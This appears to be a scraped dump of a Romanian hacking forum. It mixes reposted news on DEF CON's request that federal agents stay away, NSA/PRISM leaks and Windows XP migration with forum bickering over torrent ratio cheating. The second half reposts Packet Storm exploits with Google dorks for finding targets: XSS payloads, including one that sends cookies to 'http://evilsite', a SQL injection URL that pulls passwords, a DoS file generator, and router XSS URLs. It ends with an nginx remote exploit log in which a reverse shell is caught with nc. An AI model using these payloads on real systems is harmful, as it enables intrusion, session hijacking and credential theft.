Matt

DEF CON 21 Jeff Moss - the US government security advisor who founded the DEF CON hacking convention - has urged federal agents to stay away from the conference next month in Vegas. For the first time in the annual conference's 20-year history, g-men and spooks have been made unwelcome. Exactly how effective the request will be remains to be seen. Moss's anti-invitation was laid out in a note posted on the DEF CON website titled Feds, We Need Some Time Apart. And it reads like a text from someone who has realised an acquaintance they invite to a big blowout party every year has either been stealing from their stash or been especially mean to their other friends* : Moss, aka Dark Tangent, was appointed to the US government's Homeland Security Advisory Council by President Obama in 2009, and is chief security officer for internet overlord, ICANN. He also founded the DEF CON and Black Hat computer security conferences. It's presumed Moss's warning was in part sparked by recent revelations about the NSA and its monitoring of the world's internet connections - see the bootnote below. Feds are welcome to turn up to the top hacking conventions, provided they're transparent about it and can put up with a little ribbing from attendees. But perhaps in light of recent events, the presence of any g-men could spoil the atmosphere. Among the security experts and hacker types who have reflected on the DEF CON blog post, some think the ban won't be enforced and the invitation is purely for show; others think it's a sensible move towards defusing potential antagonism that might otherwise spoil the whole event for everyone. "I wonder if this means that the Feds will be escorted out of DEF CON, like those reporters who fail to register themselves as such," mulled Jeremiah Grossman, founder and CTO of WhiteHat Security, in a Twitter update. Robert Graham of Errata Security has a charecteristically thoughtful blog post supporting the cooling off move. "A highly visible fed presence is likely to trigger conflict with people upset over Snowden-gate," Graham wrote. "From shouting matches, to physical violence, to 'hack the fed', something bad might occur. Or, simply attendees will choose to stay away. Any reasonable conference organizer, be they pro-fed or anti-fed, would want to reduce the likelihood of this conflict. "The easiest way to do this is by reducing the number of feds at DEF CON, by asking them not to come. This is horribly unfair to them, of course, since they aren't the ones who would be starting these fights. But here's the thing: it's not a fed convention but a hacker party. The feds don't have a right to be there -- the hackers do. If bad behaving hackers are going to stir up trouble with innocent feds, it's still the feds who have to go." Tor developer and longtime NSA critic Jacob Applebaum called on other conferences to follow suit. "I hope ?#OHM2013? makes a statement similar to ?#DefCon? - the feds and cops won't follow it but saying it sets expectations," he said in a Twitter update. Applebaum's post is a reference to OHM2013: Observe. Hack. Make. which is due to take place between 31 July and 4 August in Amsterdam, the Netherlands. BSides and Black Hat events will also be held in Vegas in the run-up to this year's DEF CON. Federal agents are welcome at both of these conferences, at least the time of writing. In fact the opening day keynote at Black Hat is due to be delivered by General Keith Alexander, the head of the NSA. DEF CON is due to start the day after, running from 1 to 4 August at the Rio Hotel and Casino. Vegas promises to be action all the way over the next few weeks. ® Sursa TheRegister.co.uk

There are red faces in Redmond after Edward Snowden released a new batch of documents from the NSA's Special Source Operations (SSO) division covering Microsoft's involvement in allowing backdoor access to its software to the NSA and others. Documents seen by The Guardian detail how the NSA became concerned when Microsoft started testing Outlook.com, and asked for access. In five months Microsoft and the FBI created a workaround that gives the NSA access to encrypted chats on Outlook.com. The system went live in December last year – two months before Outlook.com's commercial launch. Those Outlook users not enabling encryption get their data slurped as a matter of course, the documents show. "For Prism collection against Hotmail, Live, and Outlook.com emails will be unaffected because Prism collects this data prior to encryption," an NSA newsletter states. Microsoft's cloud storage service SkyDrive is also easy to access, thanks to Redmond's work with the NSA. The agency reported on April 8, 2013 that Microsoft has built PRISM access into Skydrive in such a way as to remove the need for NSA analysts to get special authorization for searches in Microsoft's cloud. "Analysts will no longer have to make a special request to SSO for this – a process step that many analysts may not have known about," the leaked NSA document states. "This new capability will result in a much more complete and timely collection response. This success is the result of the FBI working for many months with Microsoft to get this tasking and collection solution established." The documents also detail how Microsoft and Skype have also been working with the intelligence agencies to install monitoring taps. Work began on integrating Prism into Skype in November 2010, they state, three months before the company was issued with an official order to comply by the US Attorney General. Data collection began on February 6, 2011, and the NSA document says the planned systems worked well, with full metadata collection enabled. It praised Microsoft for its help, saying "collaborative teamwork was the key to the successful addition of another provider to the Prism system." Work to integrate Skype into Prism into Skype didn't stop there, however. In July 2012 an NSA newsletter states Microsoft installed an upgrade that tripled the amount of Skype videos that can be monitored by NSA analysts. "The audio portions of these sessions have been processed correctly all along, but without the accompanying video. Now, analysts will have the complete 'picture'," it says. In a statement, Microsoft said that it only complies with legal demands for customer information for law enforcement and national security purposes, and that the company isn't involved in giving "the kind of blanket orders discussed in the press over the past few weeks." "When we upgrade or update products legal obligations may in some circumstances require that we maintain the ability to provide information in response to a law enforcement or national security request. There are aspects of this debate that we wish we were able to discuss more freely," it said. Not that Microsoft hasn't been making a big thing about the privacy of its communications systems in the past. Its Gmail Man ad campaign lambasted Google for snooping in people's mail to match them with advertisers, and the tagline "Your email is your business" seems somewhat ironic these days. The advert is no longer on Microsoft's YouTube channel. The leaked documents come from the NSA's Special Source Operations (SSO) division, which handles commercial company liaison for data collection by the agency. The documents show that, once collected by Prism, the NSA shares its data directly with the CIA and FBI via a custom application. "The FBI and CIA then can request a copy of Prism collection of any selector..." the document says. "These two activities underscore the point that Prism is a team sport!" In a joint statement, Shawn Turner, spokesman for the director of National Intelligence, and Judith Emmel, spokeswoman for the NSA, told The Guardian that the wiretapping referred to in the document was court-ordered and was subject to judicial oversight. "Not all countries have equivalent oversight requirements to protect civil liberties and privacy," they said. "In practice, US companies put energy, focus and commitment into consistently protecting the privacy of their customers around the world, while meeting their obligations under the laws of the US and other countries in which they operate." ® Sursa TheRegister.co.uk

Post-Snowden sensitivities to American spookery have been further inflamed after Australian website Crikey revealed a document that it says is a contract between the Federal Bureau of Investigation, the US Department of Justice and submarine cable operator Reach that allows the US entities to tap Reach's cables for national security purposes. The document's making waves because it is easy to verify - (PDF) it is dated November 29th, 2001, and bears the signatures Deputy Assistant Attorney General John G Malcolm and FBI general Counsel Larry R. Parkinson. A web search quickly produces little reason to doubt their signatures are genuine, while this document (PDF) appears to be a superset of the one Crikey found and looks decently official. Another signatory, Alex Arena of Reach's half-owner Pacific Century CyberWorks (PCCW), also likely worked for that company at the time. But it's also easy to find documents that carry identical terms and conditions, such as this one (PDF) signed by carrier TerreStar. We can therefore set aside any conclusion that the documents represent new revelations into the US spookery apparatus. But they remain of interest, for two reasons. The first is that at the time the deal was signed, Reach was half-owned by Australia's dominant Telstra, which at the time had the government of Australia as its majority shareholder. The document therefore represents, if one looks at it in just the right way, one government giving another the right to inspect traffic and store data carried by an entity it owns. Throw in the fact that Australia's government of the day was a very, very, firm US ally and things get even more interesting. The second notable element is that the document offers more detail about how the USA's intelligence agencies go about their business. The TerreStar document is text and the Reach document is a scan, so in the name of authenticity it's best if we bring you screen grabs of its contents rather than transcribing it. If you want to verify the text, the TerreStar document gives you the chance to do so. Here's a telling clause on data retention : Here's an example of what the FBI and DoJ expected Reach would “have the ability to provide in the United states,” if and when asked nicely. Little seems to have changed from the time of the Reach document's signing, 2001, and the 2009 date on the TerreStar document. In these post-Snowden times, it's not hard to suggest the document looks like another smoking gun for those building a case that US snooping knows no bounds and no shame. Throw in the fact that the Reach document was signed just weeks after 9/11 may see conspiracy-lovers get even foamier, although the missing signature from Telstra may cool that ardour. A sounder conclusion could be that this is more or less a pro forma document, albeit a pro forma that confirms the US is peering into all sorts of stuff. One last thing to consider: PCCW now operates UK Broadband, provider of the Now wireless broadband service. We're sure its customers will be interested to know its owner has form signing up for snooping charters. ® Sursa TheRegister.co.uk

HP a colaborat cu Microsoft pentru a asigura instrumente hardware si software pentru a simplifica tranzitia companiilor de pe sistemul de operare Windows XP, al carui suport va fi retras in luna aprilie 2014. Desi suportul pentru Windows XP va fi retras in mai putin de 10 luni, 40% dintre companii nu au implementat inca un sistem de operare alternativ, potrivit unui studiu realizat de catre HP. Firma de cercetare Gartner a estimat ca peste 15% dintre intreprinderile medii si mari vor rula inca pe Windows XP pe cel putin 10% dintre PC-urile acestora, dupa ce Microsoft va retrage suportul pentru sistemul de operare anul viitor. In luna aprilie a acestui an, Microsoft a postat un avertisment pe site-ul sau: "Daca organizatia dvs. nu a inceput inca migrarea la un desktop modern, sunteti in intarziere". Durata medie de implementare in sfera enterprise poate dura intre 18 si 32 de luni, iar analistii au avertizat ca societatile care nu detin un plan de migrare Windows XP risca sa se confrunte cu probleme. "Multe companii au evitat migrarea XP, temandu-se de lipsa compatibilitatii si pierderea productivitatii in timpul procesului de tranzitie", a declarat Enrique Lores, senior vicepresedinte si director general PC-uri comerciale in cadrul HP. Organizatiile care vor continua sa utilizeze Windows XP dupa retragerea suportului vor suporta costuri suplimentare pentru dezvoltarea patch-urilor de securitate software, pentru a preveni eventualele probleme de securitate care s-ar putea ivi odata cu retragerea suportului de catre Microsoft, a avertizat HP. Migrarea catre o platforma noua, cum ar fi Windows 7, poate ajuta companiile sa reduca nevoile privind suportul tehnic cu pana la 70% per PC si sa economiseasca anual 700 dolari per utilizator, a evidentiat studiul HP. Potrivit unei lucrari cu titlul "De ce legarea de Windows XP este o ideea rea", IDC a estimat ca firmele pot sa isi injumatateasca costurile de productivitate pierdute per PC prin migrarea de pe Windows XP. Pentru fiecare 230 de PC-uri, tranzitia la Windows 7 ar elibera echivalentul unei resurse full-time, indica IDCc. In timp ce produsele HP vor ajuta companiile sa migreze catre o versiune mai recenta a Windows, HP Financial Services (HPFS) va oferi ajutor in acest sens, pentru ca intregul proces sa se realizez cu investitii initiale minime, a adaugat Lores. Ofertele serviciilor financiare furnizaza clientilor planuri usoare de plata pentru o tranzitie simplificata de la Windows XP. Compania ofera, de asemenea, servicii de consultanta si sprijin pentru companii, pentru toate stadiile tranzitiei Windows XP. Microsoft a salutat investitia HP, care permite clientilor sa migreze de la popularul XP. "Prin colaborarea cu o companie precum HP, companiile pot incepe imediat sa realizeze beneficiile Windows 8 si Windows 7", a declarat Erwin Visser, director general Windows in cadrul Microsoft. Sursa: ComputerWeekly.com | Information Technology (IT) News, UK IT Jobs, Industry News

Ca sa intelegi mai bine ce zic baietii de mai sus : 4. Unele categorii au regulament intern. Verific? dac? exist? un regulament sticky înainte de a posta într-o anumite categorie. În special categoriile "CERERI"(minim 10 posturi de CALITATE), "AJUTOR"(minim 10 posturi de CALITATE) sau "Bloguri ?i Bloggeri"(minim 50 posturi CALITATE). Apoi pentru ceea ce vrei tu intra aici : https://rstforums.com/forum/71396-rst-pentesting-academy.rst Apuca-te de invatat si poti "hackui" un site. Salut.

Nu se duce.In Romania aproape toti folosim Filelist si poate mai putin SceneFZ.Aceste doua trackere mi se par exceptionale si e imposibil sa nu ai o ratie decenta. Ratio Master functioneaza , nu stiu daca si pe trackerele romanesti , multi au zis functioneaza.Eu am zis ca acest program merge perfect pe trackerele ca IPTorrents , Speed.cd , Torrentday.

Explica-i si butului de mai sus ca programul nu e o mizerie ci doar ca e prea slab sa faca o ratie.

Te doare adevarul ? Amice te bagi in seama cu japca aiurea si s-ar putea sa te cam arzi. Tu esti prea prost ca sa intelegi rostul posturilor facute de mine. Tu esti prea prost ca sa iti dai seama ca acele posturi sunt pentru prostii ca tine care n-au nicio treaba si o ard pe RST doar ca sa faca 100 de topicuri la cereri . Tu esti prea prost pentru a intra pe acele posturi facute de mine si sa vezi ca nu imi asum niciun credit pentru ele si ca au doar rol informativ.Eu nu raspund in fata ta pentru posturile mele.Posturile mele sunt mai de calitate decat sutele tale de cereri precum un milog sarman. Tu esti prea prost ca sa scrii corect. Observi " dale " Sper sa primesti ban pentru ca.. ESTI PREA PROST.

Pai daca te bate cum poti sa spui ca e o mizerie ? Stii macar cum se calculeaza ratia ? 90 % din forumul asta stie ce este Ratio Master . Nu iti mai da cu parerea despre ceva daca esti but si te bate.

Description : The vBulletin vBShout module suffers from a stored cross site scripting vulnerability. Author : []0iZy5 Source : vBulletin vBShout Cross Site Scripting ? Packet Storm Code : ########################################################################################## # # Exploit Title: vBShout vBulletin - Stored XSS Vulnerability # Google Dork: intext:vBShout # Date: 10.07.2013 # Exploit Author: []0iZy5 # Vendor Homepage: www.backtrack-linux.ro # Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?do=product&productid=2 # Version: vBulletin 3.8.x, vBulletin 4.x.x, vBulletin 5.x.x # Tested on: Linux & Windows # ########################################################################################## # # Stage 1: Go to -> UserCP -> Custom Commands # (Direct Link:) http://127.0.0.1/[path]/vbshout.php?do=profile&action=customcommands # # Stage 2: Add a malicious hash tag. # (Example:) "><script>alert(document.cookie)</script> # ########################################################################################## # # This was written for educational purpose only. use it at your own risk. # Author will be not responsible for any damage caused! user assumes all responsibility. # Intended for authorized web application pentesting only! # ##########################################################################################

Description : iVote version 1.0.0 suffers from a remote SQL injection vulnerability. Author : Ashiyane Digital Security Team Source : iVote 1.0.0 SQL Injection ? Packet Storm Code : # Exploit Title: iVot Sql Injection # Google Dork: inurl:details.php?id= # Date: 2013 July 11 # Exploit Author: Ashiyane Digital Security Team # Software Link: http://www.persianscript.ir/1391/09/25/ivote-poll-persian-script-download/ # Version: 1.0.0 # Tested on: Linux CentOS , Linux Ubunto , Windows 8 vulnerability : details.php on line 5 $id = $_GET['id']; $selectc = mysql_query("SELECT * FROM comments WHERE id = $id"); $select = mysql_query("SELECT * FROM votes WHERE V_Id = $id"); $row = mysql_fetch_array($select); /////////////////////////////////////// Example : http://example.com/iVote/details.php?id=1 union select 1,password,3,4 from settings /////////////////////// TNX : Rz04 & Crypt0 I Love Iran & all IRanian Black Hats I'm , Bi Edea (R3za) Email : momtane666@yahoo.com Gmail : kafaran.blackhats@Gmail.com

Description : The vBulletin Advanced User Tagging module suffers from a stored cross site scripting vulnerability. Author : []0iZy5 Source : vBulletin Advanced User Tagging Cross Site Scripting ? Packet Storm Code : ########################################################################################## # # Exploit Title: Advanced User Tagging vBulletin - Stored XSS Vulnerability # Google Dork: intext:usertag_pro # Date: 10.07.2013 # Exploit Author: []0iZy5 # Vendor Homepage: www.backtrack-linux.ro # Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?productid=20&do=product # Version: vBulletin 3.8.x, vBulletin 4.x.x # Tested on: Linux & Windows # ########################################################################################## # # Stage 1: Go to -> UserCP -> Hash Tag Subscriptions # (Direct Link:) http://127.0.0.1/[path]/usertag.php?do=profile&action=hashsubscription # # Stage 2: Add a malicious hash tag. # (Example:) "><script>alert(document.cookie)</script> # ########################################################################################## # # This was written for educational purpose only. use it at your own risk. # Author will be not responsible for any damage caused! user assumes all responsibility. # Intended for authorized web application pentesting only! # ##########################################################################################

Description : Jolix Media Player version 1.1.0 suffers from a denial of service vulnerability. Author : IndonesiaGokilTeam Source : Jolix Media Player 1.1.0 Denial Of Service ? Packet Storm Code : #!/usr/bin/python print """ [+]Judul Ledakan:Jolix Media Player (.m3u) Denial of Service Exploit [+]Celah versi: Version 1.1.0 [+]Mengunduh produk: [url]http://www.jolixtools.com/downloads/jolix-media-player-setup.exe[/url] [+]Hari Tanggal Tahun: 09.07.2013 [+]Penulis: IndonesiaGokilTeam [+]Dicoba di sistem operasi: Windows xp sp 3 """ sampah = "\x41" * 1000 ledakan = sampah try: rst= open("SampahMasyarakat.m3u",'w') rst.write(ledakan) rst.close() print("\nFile Sampah Masyarakat dibuat !\n") except: print "Gagal"

Description : Project Pier version 0.8.8 suffers from cross site scripting and cookies that fail to set HttpOnly and Secure flags. Author : Carl Benedict Source : Project Pier 0.8.8 XSS / Insecure Cookies ? Packet Storm Code : Summary -------------------- Software : ProjectPier Version : 0.8.8 (other versions untested) Website : http://www.projectpier.org Issue : XSS (stored), Insecure Cookie storage CVSS Base : (AV:N/AC:M/Au:S/C:C/I:C/A:N) CVSS Score: 7.9 Researcher: Carl Benedict Product Description -------------------- ProjectPier is a Free, Open-Source, PHP web application for managing tasks, projects and teams through an intuitive web interface. Details -------------------- The ProjectPier web application is affected by stored XSS and insecure cookie storage. The combination of these two vulnerabilities can lead to full compromise of application credentials by stealing session cookies. The stored XSS can be found in the Contact Name, Contact Company Name, Contact Description fields. Proof of Concept -------------------- Enter any of the following strings into the Contact Name, Contact Company Name, and Company Description fields will generate a JavaScript alert dialog when viewing Contacts: <script>alert(1)</script %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e Cookie insecurity: The session cookies are not protected by the HttpOnly or Secure flags, allowing them to be accessed via JavaScript and sent over HTTP. Basic JavaScript alert, returning cookie values: <script>alert(document.cookie)</script JavaScript that sends all cookie values to 'http://evilsite' for logging and reuse on the attacker side: <script>var url1 = "<img src=http://evilsite/" + encodeURIComponent(document.cookie) + ">"; document.writeln(url1); </script History -------------------- 11/07/2012 : Initial contact 11/07/2012 : Vendor response. Fix planned 11/12/2012 : Update requested 05/21/2013 : No updates. Advisory released References -------------------- Bug Report : http://www.projectpier.org/node/4520 Screen Shot: http://www.projectpier.org/files/issues/ppci.jpg Screen Shot: http://www.projectpier.org/files/issues/ppci2.jpg Screen Shot: http://www.projectpier.org/files/issues/ppxss.jpg

Description : Cisco Linksys E1200 and N300 devices suffer from a cross site scripting vulnerability. Author : Carl Benedict Source : Cisco Linksys E1200 / N300 Cross Site Scripting ? Packet Storm Code : Summary -------------------- Software : Cisco/Linksys Router OS Hardware : E1200 N300 (others currently untested) Version : 2.0.04 (others currently untested) Website : http://www.linksys.com Issue : Reflected XSS Severity : Medium Researcher: Carl Benedict (theinfinitenigma) Product Description -------------------- The Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access point, and 10/100 switch. Details -------------------- The apply.cgi page, which backs all HTML forms on the device, is vulnerable to reflected XSS via the 'submit_button' parameter. The vulnerability is caused due to a lack of input validation and poor/missing server side validation checks. This attack requires an authenticated session. This application uses HTTP basic authentication. Because of this, there is no session, which increases the likelihood of this attack being successful. Sample URL #1 (HTTP GET request): http://192.168.1.1/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27 Sample URL #2 (HTTP GET request): http://192.168.1.1/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1 History -------------------- 04/26/2013 : Discovery 04/27/2013 : Advisory released

Description : Air Drive Plus version 2.4 for iOS suffers from local file inclusion, script inclusion, and remote arbitrary file upload vulnerabilities. Author : Benjamin Kunz Mejri Source : Air Drive Plus 2.4 LFI / XSS / File Upload ? Packet Storm Code : Title: ====== Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability Date: ===== 2013-07-09 References: =========== http://www.vulnerability-lab.com/get_content.php?id=1000 VL-ID: ===== 1000 Common Vulnerability Scoring System: ==================================== 6.7 Introduction: ============= Turn your iPhone, iPod touch, and iPad into a wireless disk. Share your files and photos over network, no USB cable or extra software required. Features ... [Server] function Easily access your files from any web browser. Easily upload and download your photo from photo libraries via web browser. [My Files] function Preview/Move/Copy/Delete/Unzip/Rename/Email file and Create new directory on your iPhone, iPod touch & iPad. Image: png, jpg, gif Document: Word, PowerPoint, Excel, PDF Compressed: zip Text-base: txt, html, php, js, css Media: mp3, wav, mp4, mov Save Word, PowerPoint, Excel and PDF files from other apps to Air Drive, include Apple’s Email app and Safari. Open All types of file from Air Drive to other apps such as Dropbox. [Settings] function Add Password to prevent unauthorized access to your files. Customize the Server port and Real-time On/Off the sharing functions and takes effect immediately to restrict the access from web browser (Copy of the Homepage: https://itunes.apple.com/de/app/air-drive-plus-your-file-manager/id422806570 ) Abstract: ========= The Vulnerability Laboratory Research Team discovered a remote file include vulnerability in the Air Drive Plus 2.4 application (Apple iOS - iPad&iPhone). Report-Timeline: ================ 2013-07-09: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== Apple AppStore Product: Air Drive Plus 2.4 Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== A local file include and arbitrary file upload web vulnerability is detected in the Air Drive Plus 2.4 application (Apple iOS - iPad&iPhone). The vulnerability allows remote attackers to upload files via POST method with multiple extensions to unauthorized access them on application-side of the service. The vulnerability is located in the file upload/add (AirDriveAction_file_add) module of the web-server (http://localhost:8000/) when processing to request a manipulated filename via POST. The injected file will be accessable via the index listing module of the application. Remote attackers can exchange the filename with a double or tripple extension bia POST method to bypass the upload validation and filter process. After the upload the attacker access the file with one extension and exchange it with the other one to execute for example php codes. A persistent script code injection is detected in the filename parameter. Attackers can tamper the request and exchange the file name with persistent malicious script code or tags. The code will be executed in the main index site when processing to list the object (file) items. Attackers are also able to inject persistent code with local frame requests to unauthorized access application data/apps or restricted application information. The execution of the persistent code also occurs when an application user is processing to delete the malicious context. The injected code is stored and will be executed from the delete notification and protection message. Exploitation of the vulnerability requires no user interaction and also without privilege application user account (no password standard). Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload. Vulnerable Application(s): [+] Air Drive Plus 2.4 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] File Upload (Web Server) [Remote] Vulnerable File(s): [+] AirDriveAction_file_add Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Application Index Listing (http://localhost:8000/) Proof of Concept: ================= The arbitrary file upload vulnerability can be exploited by remote attackers without privileged application user account and also without user interaction. For demonstration or reproduce ... 1.1 <tr><td><img src="Air%20Drive%20-%20Files_files/file.png" height="20px" width="20px"></td><td><a target="_blank" href="http://192.168.2.104:8000/AirDriveAction_file_show/;/private/var/mobile/Applications">;/private/var/mobile/Applications/</a></td> <td>27,27KB</td><td align="center">2013-07-08 23:07:52</td><td align="center"> <a onclick="javascript:delfile("/private/var/mobile/Applications");" class="transparent_button">Delete</a></td></tr> 1.2 <tr><td><img src="Air%20Drive%20-%20Files_files/file.png" height="20px" width="20px"></td><td><a target="_blank" href="http://192.168.2.104:8000/AirDriveAction_file_show/1337.png.gif.php.js.html">1337.png.gif.php.js.html</a></td> <td>27,27KB</td><td align="center">2013-07-08 23:07:52</td><td align="center"><a onclick="javascript:delfile("1337.png.gif.php.js.html");" class="transparent_button">Delete</a></td></tr> 1.3 <tr><td><img src="Air%20Drive%20-%20Files_files/file.png" height="20px" width="20px"></td><td><a target="_blank" href="http://192.168.2.104:8000/AirDriveAction_file_show/[PERSISTENT INJECTED SCRIPT CODE!]1337.png">[PERSISTENT INJECTED SCRIPT CODE!]1337.png</a></td><td>27,27KB</td><td align="center"> 2013-07-08 23:07:52</td><td align="center"><a onclick="javascript:delfile("[PERSISTENT INJECTED SCRIPT CODE!]1337.png");" class="transparent_button">Delete</a></td></tr> --- Session Request Log --- Status: 302[Found] POST http://localhost:8000/AirDriveAction_file_add Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[83] Mime Type[text/html] Request Headers: Host[localhost:8000] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://localhost:8000/index_files.html] Connection[keep-alive] Post Data: POST_DATA[-----------------------------228191371227676 Content-Disposition: form-data; name="uploadfile"; filename=";/private/var/mobile/Applications/1337.png" Reference(s): http://localhost:8000/AirDriveAction_file_add Risk: ===== The security risk of the arbitrary file upload vulnerability and the multiple extensions issue are estimated as high(+). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com

Description : nginx version 1.3.9 and 1.4.0 x86 brute force proof of concept remote exploit that spawns a reverse shell. Author : Kingcope Source : nginx 1.3.9 / 1.4.0 x86 Brute Force Proof Of Concept ? Packet Storm Code : #nginx 1.3.9/1.4.0 x86 brute force remote exploit # copyright (c) 2013 kingcope #---------------------------- #fix for internet exploitation, set MTU: #ifconfig <interface> mtu 60000 up # ### # !!! WARNING !!! # this exploit is unlikely to succeed when used against remote internet hosts. # the reason is that nginx uses a non-blocking read() at the remote connection, # this makes exploitation of targets on the internet highly unreliable. # (it has been tested against a testbed on the internet but I couldn't exploit # any other box with it. required was the above ifconfig setting on the client. # maybe enabling large tcp frame support on a gigabit connection is more # useful) # so use it inside intranets only (duh!), this remains a PoC for now # The exploit does not break stack cookies but makes use of a reliable method # to retrieve all needed offsets for Linux x86 and pop a shell. ### #TODO #*cleanup code #*implement stack cookie break and amd64 support #*support proxy_pass directive ### =for comment TARGET TESTS (Debian, Centos, OpenSuSE) 1. Debian 7 perl ngxunlock.pl 192.168.27.146 80 192.168.27.146 443 Testing if remote httpd is vulnerable % SEGV % YES % Finding align distance (estimate) testing 5250 align % SEGV % testing 5182 align % SEGV % Verifying align Finding align distance (estimate) testing 5250 align % SEGV % testing 5182 align % SEGV % Finding write offset, determining exact align testing 0x08049c50, 5184 align % SURVIVED % Extracting memory \ bin search done, read 20480 bytes exact align found 5184 Finding exact library addresses trying plt 0x08049a32, got 0x080bc1a4, function 0xb76f4a80 % FOUND exact ioctl 0x08049a30 % trying plt 0x08049ce2, got 0x080bc250, function 0xb773e890 % FOUND exact memset 0x08049ce0 % trying plt 0x08049d52, got 0x080bc26c, function 0xb76f8d40 % FOUND exact mmap64 0x08049d50 % Found library offsets, determining mnemonics trying 0x0804ed2d % SURVIVED % exact large pop ret 0x0804a7eb exact pop x3 ret 0x0804a7ee bin search done | See reverse handler for success nc -v -l -p 443 listening on [any] 443 ... 192.168.27.146: inverse host lookup failed: Unknown host connect to [192.168.27.146] from (UNKNOWN) [192.168.27.146] 34778 uname -a;id; Linux dakkong 3.2.0-4-686-pae #1 SMP Debian 3.2.46-1 i686 GNU/Linux uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) cat /etc/debian_version 7.1 2. CentOS 6.4 perl ngxunlock.pl 192.168.27.129 80 192.168.27.129 443 Testing if remote httpd is vulnerable % SEGV % YES % Finding align distance (estimate) testing 5250 align % SEGV % testing 5194 align % SEGV % Verifying align Finding align distance (estimate) testing 5250 align % SEGV % testing 5194 align % SEGV % Finding write offset, determining exact align testing 0x08049990, 5200 align % SURVIVED % Extracting memory / bin search done, read 20480 bytes exact align found 5200 Finding exact library addresses trying plt 0x080499f2, got 0x080b31ac, function 0x0094a6b0 % FOUND exact memset 0x080499f0 % trying plt 0x08049b52, got 0x080b3204, function 0x008f1fd0 % FOUND exact ioctl 0x08049b50 % trying plt 0x08049f12, got 0x080b32f4, function 0x008f72c0 % FOUND exact mmap64 0x08049f10 % Found library offsets, determining mnemonics trying 0x0804e9d4 % SURVIVED % exact large pop ret 0x0806194d exact pop x3 ret 0x0804a832 bin search done / See reverse handler for success nc -v -l 443 Connection from 192.168.27.129 port 443 [tcp/https] accepted uname -a;id; Linux localhost.localdomain 2.6.32-358.el6.i686 #1 SMP Thu Feb 21 21:50:49 UTC 2013 i686 i686 i386 GNU/Linux uid=99(nobody) gid=99(nobody) groups=99(nobody) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 cat /etc/redhat* CentOS release 6.4 (Final) 3. OpenSuSE 12.1 perl ngxunlock.pl 192.168.27.135 80 192.168.27.135 443 Testing if remote httpd is vulnerable % SEGV % YES % Finding align distance (estimate) testing 5250 align % SEGV % testing 5182 align % SEGV % Verifying align Finding align distance (estimate) testing 5250 align % SEGV % testing 5182 align % SEGV % Finding write offset, determining exact align testing 0x08049a18, 5184 align % SURVIVED % Extracting memory \ bin search done, read 20480 bytes exact align 